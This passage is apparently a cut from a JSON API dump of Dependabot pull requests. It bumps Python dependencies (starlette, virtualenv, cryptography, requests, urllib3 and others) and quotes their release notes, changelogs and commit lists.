(truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/encode/starlette/blob/master/docs/release-notes.md\"\u003estarlette's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.47.1 (June 21, 2025)\u003c/h2\u003e\n\u003ch4\u003eFixed\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eUse \u003ccode\u003eSelf\u003c/code\u003e in \u003ccode\u003eTestClient.__enter__\u003c/code\u003e \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2951\"\u003e#2951\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eAllow async exception handlers to type-check \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2949\"\u003e#2949\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.47.0 (May 29, 2025)\u003c/h2\u003e\n\u003ch4\u003eAdded\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eAdd support for ASGI \u003ccode\u003epathsend\u003c/code\u003e extension \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2671\"\u003e#2671\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003epartitioned\u003c/code\u003e attribute to \u003ccode\u003eResponse.set_cookie\u003c/code\u003e \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2501\"\u003e#2501\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eChanged\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eChange \u003ccode\u003emethods\u003c/code\u003e parameter type from \u003ccode\u003elist[str]\u003c/code\u003e to \u003ccode\u003eCollection[str]\u003c/code\u003e\n\u003ca href=\"https://redirect.github.com/encode/starlette/pull/2903\"\u003e#2903\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eReplace \u003ccode\u003eimport typing\u003c/code\u003e by \u003ccode\u003efrom typing import ...\u003c/code\u003e in the whole codebase\n\u003ca href=\"https://redirect.github.com/encode/starlette/pull/2867\"\u003e#2867\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eFixed\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eMark \u003ccode\u003eExceptionMiddleware.http_exception\u003c/code\u003e as async to prevent thread creation\n\u003ca href=\"https://redirect.github.com/encode/starlette/pull/2922\"\u003e#2922\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.46.2 (April 13, 2025)\u003c/h2\u003e\n\u003ch4\u003eFixed\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003ePrevents reraising of exception from BaseHttpMiddleware \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2911\"\u003e#2911\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eUse correct index on backwards compatible logic in \u003ccode\u003eTemplateResponse\u003c/code\u003e \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2909\"\u003e#2909\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.46.1 (March 8, 2025)\u003c/h2\u003e\n\u003ch4\u003eFixed\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eAllow relative directory path when \u003ccode\u003efollow_symlinks=True\u003c/code\u003e \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2896\"\u003e#2896\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.46.0 (February 22, 2025)\u003c/h2\u003e\n\u003ch4\u003eAdded\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eGZipMiddleware\u003c/code\u003e: Make sure \u003ccode\u003eVary\u003c/code\u003e header is always added if a response can be compressed \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2865\"\u003e#2865\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eFixed\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eRaise exception from background task on BaseHTTPMiddleware \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2812\"\u003e#2812\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eGZipMiddleware\u003c/code\u003e: Don't compress on server sent events \u003ca href=\"https://redirect.github.com/encode/starlette/pull/2871\"\u003e#2871\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/starlette/commit/fa5355442753f794965ae1af0f87f9fec1b9a3de\"\u003e\u003ccode\u003efa53554\u003c/code\u003e\u003c/a\u003e Version 0.47.1 (\u003ca href=\"https://redirect.github.com/encode/starlette/issues/2952\"\u003e#2952\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/starlette/commit/e741635e5452ba8013d926bddf2be3a292910dca\"\u003e\u003ccode\u003ee741635\u003c/code\u003e\u003c/a\u003e Use \u003ccode\u003eSelf\u003c/code\u003e in \u003ccode\u003eTestClient.__enter__\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/encode/starlette/issues/2951\"\u003e#2951\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/starlette/commit/739ea4928b11d4b4cb2b366ccad11405ef3034c4\"\u003e\u003ccode\u003e739ea49\u003c/code\u003e\u003c/a\u003e Allow async exception handlers to type-check (\u003ca href=\"https://redirect.github.com/encode/starlette/issues/2949\"\u003e#2949\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/starlette/commit/78da9b9e218ab289117df7d62aee200ed4c59617\"\u003e\u003ccode\u003e78da9b9\u003c/code\u003e\u003c/a\u003e Bump the python-packages group with 6 updates (\u003ca href=\"https://redirect.github.com/encode/starlette/issues/2948\"\u003e#2948\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/starlette/commit/739321d719db5b6e3fff9ccca9a2ccc7c2e07f18\"\u003e\u003ccode\u003e739321d\u003c/code\u003e\u003c/a\u003e Version 0.47.0 (\u003ca href=\"https://redirect.github.com/encode/starlette/issues/2947\"\u003e#2947\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/starlette/commit/af1c709a7d1b92dee2921cceef7ef8d1df65ad25\"\u003e\u003ccode\u003eaf1c709\u003c/code\u003e\u003c/a\u003e Add support for ASGI \u003ccode\u003epathsend\u003c/code\u003e extension (\u003ca href=\"https://redirect.github.com/encode/starlette/issues/2671\"\u003e#2671\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/starlette/commit/f0997431a51116e43d5f5b6538e3ecf4e8fea704\"\u003e\u003ccode\u003ef099743\u003c/code\u003e\u003c/a\u003e Make annotation for \u003ccode\u003emethods\u003c/code\u003e more permissive (\u003ca href=\"https://redirect.github.com/encode/starlette/issues/2903\"\u003e#2903\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/starlette/commit/2ff76532710cdc49d6f9b3e5067533aa481cecd0\"\u003e\u003ccode\u003e2ff7653\u003c/code\u003e\u003c/a\u003e chore: improve type hints (\u003ca href=\"https://redirect.github.com/encode/starlette/issues/2867\"\u003e#2867\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/starlette/commit/bc4b9379c363a4c136cc0f8f29bb89ec7d641d3e\"\u003e\u003ccode\u003ebc4b937\u003c/code\u003e\u003c/a\u003e CI: skips type check until mypy ready for 3.14 (\u003ca href=\"https://redirect.github.com/encode/starlette/issues/2936\"\u003e#2936\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/starlette/commit/4acf1d1ca3e8aa767567cb4e6e12f093f066553b\"\u003e\u003ccode\u003e4acf1d1\u003c/code\u003e\u003c/a\u003e feat: add partitioned attribute to cookie (\u003ca href=\"https://redirect.github.com/encode/starlette/issues/2501\"\u003e#2501\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/encode/starlette/compare/0.40.0...0.47.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `virtualenv` from 20.26.6 to 20.31.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pypa/virtualenv/releases\"\u003evirtualenv's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e20.31.2\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003erelease 20.31.1 by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2882\"\u003epypa/virtualenv#2882\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eReintroduce the --wheel CLI option, even though it has no effect on Python \u0026gt; 3.8 by \u003ca href=\"https://github.com/hroncok\"\u003e\u003ccode\u003e@​hroncok\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2884\"\u003epypa/virtualenv#2884\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pypa/virtualenv/compare/20.31.1...20.31.2\"\u003ehttps://github.com/pypa/virtualenv/compare/20.31.1...20.31.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e20.31.1\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003erelease 20.31.0 by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2879\"\u003epypa/virtualenv#2879\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump setuptools and pip by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2880\"\u003epypa/virtualenv#2880\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pypa/virtualenv/compare/20.31.0...20.31.1\"\u003ehttps://github.com/pypa/virtualenv/compare/20.31.0...20.31.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e20.31.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003erelease 20.30.0 by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2864\"\u003epypa/virtualenv#2864\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eStop including 'wheel', setuptools 70.1 has native bdist_wheel support by \u003ca href=\"https://github.com/stefanor\"\u003e\u003ccode\u003e@​stefanor\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2868\"\u003epypa/virtualenv#2868\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRevert a large part of the wheel removal, to support Python 3.8 by \u003ca href=\"https://github.com/stefanor\"\u003e\u003ccode\u003e@​stefanor\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2876\"\u003epypa/virtualenv#2876\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix HelpFormatter for Python 3.14 by \u003ca href=\"https://github.com/cdce8p\"\u003e\u003ccode\u003e@​cdce8p\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2878\"\u003epypa/virtualenv#2878\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix get_embed_wheel for unknown wheels by \u003ca href=\"https://github.com/tiran\"\u003e\u003ccode\u003e@​tiran\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2877\"\u003epypa/virtualenv#2877\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cdce8p\"\u003e\u003ccode\u003e@​cdce8p\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2878\"\u003epypa/virtualenv#2878\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tiran\"\u003e\u003ccode\u003e@​tiran\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2877\"\u003epypa/virtualenv#2877\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pypa/virtualenv/compare/20.30.0...20.31.0\"\u003ehttps://github.com/pypa/virtualenv/compare/20.30.0...20.31.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e20.30.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003erelease 20.29.3 by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2855\"\u003epypa/virtualenv#2855\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd GraalPy support by \u003ca href=\"https://github.com/timfel\"\u003e\u003ccode\u003e@​timfel\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2859\"\u003epypa/virtualenv#2859\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpgrade setuptools by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2863\"\u003epypa/virtualenv#2863\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/timfel\"\u003e\u003ccode\u003e@​timfel\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2859\"\u003epypa/virtualenv#2859\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pypa/virtualenv/compare/20.29.3...20.30.0\"\u003ehttps://github.com/pypa/virtualenv/compare/20.29.3...20.30.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e20.29.3\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pypa/virtualenv/blob/main/docs/changelog.rst\"\u003evirtualenv's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev20.31.2 (2025-05-08)\u003c/h2\u003e\n\u003cp\u003eNo significant changes.\u003c/p\u003e\n\u003ch2\u003ev20.31.1 (2025-05-05)\u003c/h2\u003e\n\u003cp\u003eBugfixes - 20.31.1\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e- Upgrade embedded wheels:\n\u003cul\u003e\n\u003cli\u003epip to \u003ccode\u003e25.1.1\u003c/code\u003e from \u003ccode\u003e25.1\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003esetuptools to \u003ccode\u003e80.3.1\u003c/code\u003e from \u003ccode\u003e78.1.0\u003c/code\u003e (:issue:\u003ccode\u003e2880\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev20.31.0 (2025-05-05)\u003c/h2\u003e\n\u003cp\u003eFeatures - 20.31.0\u003cbr /\u003e\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNo longer bundle \u003ccode\u003ewheel\u003c/code\u003e wheels (except on Python 3.8), \u003ccode\u003esetuptools\u003c/code\u003e includes native \u003ccode\u003ebdist_wheel\u003c/code\u003e support.  Update \u003ccode\u003epip\u003c/code\u003e to \u003ccode\u003e25.1\u003c/code\u003e. (:issue:\u003ccode\u003e2868\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eBugfixes - 20.31.0\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e- ``get_embed_wheel()`` no longer fails with a :exc:`TypeError` when it is\n  called with an unknown *distribution*. (:issue:`2877`)\n- Fix ``HelpFormatter`` error with Python 3.14.0b1. (:issue:`2878`)\n\u003ch2\u003ev20.30.0 (2025-03-31)\u003c/h2\u003e\n\u003cp\u003eFeatures - 20.30.0\u003cbr /\u003e\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd support for \u003ccode\u003eGraalPy \u0026lt;https://github.com/oracle/graalpython\u0026gt;\u003c/code\u003e_. (:issue:\u003ccode\u003e2832\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eBugfixes - 20.30.0\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e- Upgrade embedded wheels:\n\u003cul\u003e\n\u003cli\u003esetuptools to \u003ccode\u003e78.1.0\u003c/code\u003e from \u003ccode\u003e75.3.2\u003c/code\u003e (:issue:\u003ccode\u003e2863\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev20.29.3 (2025-03-06)\u003c/h2\u003e\n\u003cp\u003eBugfixes - 20.29.3\u003cbr /\u003e\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eIgnore unreadable directories in \u003ccode\u003ePATH\u003c/code\u003e. (:issue:\u003ccode\u003e2794\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003ev20.29.2 (2025-02-10)\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/91cf77181ce159d8de6250224781f7103e6d6661\"\u003e\u003ccode\u003e91cf771\u003c/code\u003e\u003c/a\u003e release 20.31.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/9c4cd8e1a4744e4dc630b2ee35a506ad91ac4137\"\u003e\u003ccode\u003e9c4cd8e\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2884\"\u003e#2884\u003c/a\u003e from hroncok/wheel-option-back\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/e9b6ba728f44ffb84ca44a40b58508c3dd5f7b29\"\u003e\u003ccode\u003ee9b6ba7\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2882\"\u003e#2882\u003c/a\u003e from pypa/release-20.31.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/71d6f0a03c36619ca6bc4f37711f8fb8b2894758\"\u003e\u003ccode\u003e71d6f0a\u003c/code\u003e\u003c/a\u003e Update changelog.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/572aa2319783c58d2729dd94a0e3fb5435d62ff3\"\u003e\u003ccode\u003e572aa23\u003c/code\u003e\u003c/a\u003e release 20.31.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/715268e5fb0a323690b722efcd2e2cf5a14cd5ba\"\u003e\u003ccode\u003e715268e\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2880\"\u003e#2880\u003c/a\u003e from gaborbernat/main\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/472157d7ad566dc999948f7d87d9ec5dc6508806\"\u003e\u003ccode\u003e472157d\u003c/code\u003e\u003c/a\u003e Bump setuptools and pip\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/f7d440dc29c0a6c6d29c1fdd4ddf65b7b10daa0b\"\u003e\u003ccode\u003ef7d440d\u003c/code\u003e\u003c/a\u003e release 20.31.0 (\u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2879\"\u003e#2879\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/2b7ea303bcd64959f88f2617ebba74a6e2ecb646\"\u003e\u003ccode\u003e2b7ea30\u003c/code\u003e\u003c/a\u003e release 20.31.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/a2e76cb116adfc20d05623b4fa075e4ca222cf6e\"\u003e\u003ccode\u003ea2e76cb\u003c/code\u003e\u003c/a\u003e Fix get_embed_wheel for unknown wheels (\u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2877\"\u003e#2877\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pypa/virtualenv/compare/20.26.6...20.31.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot merge` will merge this PR after your CI passes on it\n- `@dependabot squash and merge` will squash and merge this PR after your CI passes on it\n- `@dependabot cancel merge` will cancel a previously requested merge and block automerging\n- `@dependabot reopen` will reopen this PR if it is closed\n- `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/zxenonx/zc_messaging/network/alerts).\n\n\u003c/details\u003e","html_url":"https://github.com/zxenonx/zc_messaging/pull/94","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/zxenonx%2Fzc_messaging/issues/94","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/94/packages"},{"uuid":"2603097547","node_id":"PR_kwDOOjqlA86bKB3L","number":1,"state":"closed","title":"build(deps): bump the pip group across 1 directory with 4 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":0,"pull_request":true,"closed_at":"2025-06-19T14:44:53.000Z","author_association":"NONE","state_reason":null,"created_at":"2025-06-18T22:51:44.000Z","updated_at":"2025-06-19T14:44:53.000Z","time_to_close":57189,"merged_at":"2025-06-19T14:44:53.000Z","merged_by":"Emadalshamery","closed_by":null,"dependency_metadata":{"prefix":"build(deps): bump","group_name":"pip","update_count":4,"packages":[{"name":"cryptography","old_version":"43.0.1","new_version":"44.0.1","repository_url":"https://github.com/pyca/cryptography"},{"name":"py","old_version":"1.10.0","new_version":"1.11.0","repository_url":"https://github.com/pytest-dev/py"},{"name":"requests","old_version":"2.32.0","new_version":"2.32.4","repository_url":"https://github.com/psf/requests"},{"name":"urllib3","old_version":"1.26.19","new_version":"2.5.0","repository_url":"https://github.com/urllib3/urllib3"}],"path":null,"ecosystem":"pip"},"body":"Bumps the pip group with 4 updates in the /binary-option/client directory: [cryptography](https://github.com/pyca/cryptography), [py](https://github.com/pytest-dev/py), [requests](https://github.com/psf/requests) and [urllib3](https://github.com/urllib3/urllib3).\n\nUpdates `cryptography` from 43.0.1 to 44.0.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pyca/cryptography/blob/main/CHANGELOG.rst\"\u003ecryptography's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e44.0.1 - 2025-02-11\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* Updated Windows, macOS, and Linux wheels to be compiled with OpenSSL 3.4.1.\n* We now build ``armv7l`` ``manylinux`` wheels and publish them to PyPI.\n* We now build ``manylinux_2_34`` wheels and publish them to PyPI.\n\u003cp\u003e.. _v44-0-0:\u003c/p\u003e\n\u003cp\u003e44.0.0 - 2024-11-27\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBACKWARDS INCOMPATIBLE:\u003c/strong\u003e Dropped support for LibreSSL \u0026lt; 3.9.\u003c/li\u003e\n\u003cli\u003eDeprecated Python 3.7 support. Python 3.7 is no longer supported by the\nPython core team. Support for Python 3.7 will be removed in a future\n\u003ccode\u003ecryptography\u003c/code\u003e release.\u003c/li\u003e\n\u003cli\u003eUpdated Windows, macOS, and Linux wheels to be compiled with OpenSSL 3.4.0.\u003c/li\u003e\n\u003cli\u003emacOS wheels are now built against the macOS 10.13 SDK. Users on older\nversions of macOS should upgrade, or they will need to build\n\u003ccode\u003ecryptography\u003c/code\u003e themselves.\u003c/li\u003e\n\u003cli\u003eEnforce the :rfc:\u003ccode\u003e5280\u003c/code\u003e requirement that extended key usage extensions must\nnot be empty.\u003c/li\u003e\n\u003cli\u003eAdded support for timestamp extraction to the\n:class:\u003ccode\u003e~cryptography.fernet.MultiFernet\u003c/code\u003e class.\u003c/li\u003e\n\u003cli\u003eRelax the Authority Key Identifier requirements on root CA certificates\nduring X.509 verification to allow fields permitted by :rfc:\u003ccode\u003e5280\u003c/code\u003e but\nforbidden by the CA/Browser BRs.\u003c/li\u003e\n\u003cli\u003eAdded support for :class:\u003ccode\u003e~cryptography.hazmat.primitives.kdf.argon2.Argon2id\u003c/code\u003e\nwhen using OpenSSL 3.2.0+.\u003c/li\u003e\n\u003cli\u003eAdded support for the :class:\u003ccode\u003e~cryptography.x509.Admissions\u003c/code\u003e certificate extension.\u003c/li\u003e\n\u003cli\u003eAdded basic support for PKCS7 decryption (including S/MIME 3.2) via\n:func:\u003ccode\u003e~cryptography.hazmat.primitives.serialization.pkcs7.pkcs7_decrypt_der\u003c/code\u003e,\n:func:\u003ccode\u003e~cryptography.hazmat.primitives.serialization.pkcs7.pkcs7_decrypt_pem\u003c/code\u003e, and\n:func:\u003ccode\u003e~cryptography.hazmat.primitives.serialization.pkcs7.pkcs7_decrypt_smime\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e.. _v43-0-3:\u003c/p\u003e\n\u003cp\u003e43.0.3 - 2024-10-18\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* Fixed release metadata for ``cryptography-vectors``\n\u003cp\u003e.. _v43-0-2:\u003c/p\u003e\n\u003cp\u003e43.0.2 - 